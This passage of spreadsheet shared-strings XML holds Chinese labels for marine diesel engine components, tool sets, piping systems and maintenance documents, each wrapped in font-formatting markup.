      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接检查</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油盘</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸造机架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接机架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸造扫气箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接扫气箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>全铸造机架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导板和盖子</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组合式曲轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞带活塞杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摇臂和支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压阀齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条和链轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水柱压力表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>静压力布置</t>
    </r>
  </si>
  <si>
    <r>
      <t>23</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>45</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套控制系统</t>
    </r>
  </si>
  <si>
    <r>
      <t>45</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套控制系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵和自动装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>38</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套示功阀驱动机构</t>
    </r>
  </si>
  <si>
    <r>
      <t>54</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套示功阀驱动机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀机构</t>
    </r>
  </si>
  <si>
    <r>
      <t>40</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>56</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套扫气管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩压管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩压管管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备用鼓风机</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>振动报警订购清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>58</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套飞轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>59</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套盘车机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车安全设备</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>63</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套气缸注油器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>42</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套空冷器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>93</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套空冷器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧支架布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>71</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套推力轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顺时针推力块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端管系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧端管系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警系统安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端滑油管系</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配器管系</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动系统布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水冷却水泄放主管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套冷却水管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水冷却水进口主管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水管系</t>
    </r>
  </si>
  <si>
    <r>
      <t>901</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>—</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>903</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>—</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>904</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>—</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头连杆工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>905</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>—</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴推力轴承工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>906</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>—</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵机构工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>907</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>—</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气系统工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>908</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>—</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>909</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>—</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>911</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>—</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全设备工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>912</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>—</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>大件装配工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>913</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>—</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>925</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>—</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>98</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套空气分配器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>57</t>
    </r>
  </si>
  <si>
    <r>
      <t>CO2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灭火系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水雾灭火系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查和维护计划</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全措施</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>日志卷一</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卷三首页</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明，卷一、二、三</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>往复运动部件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
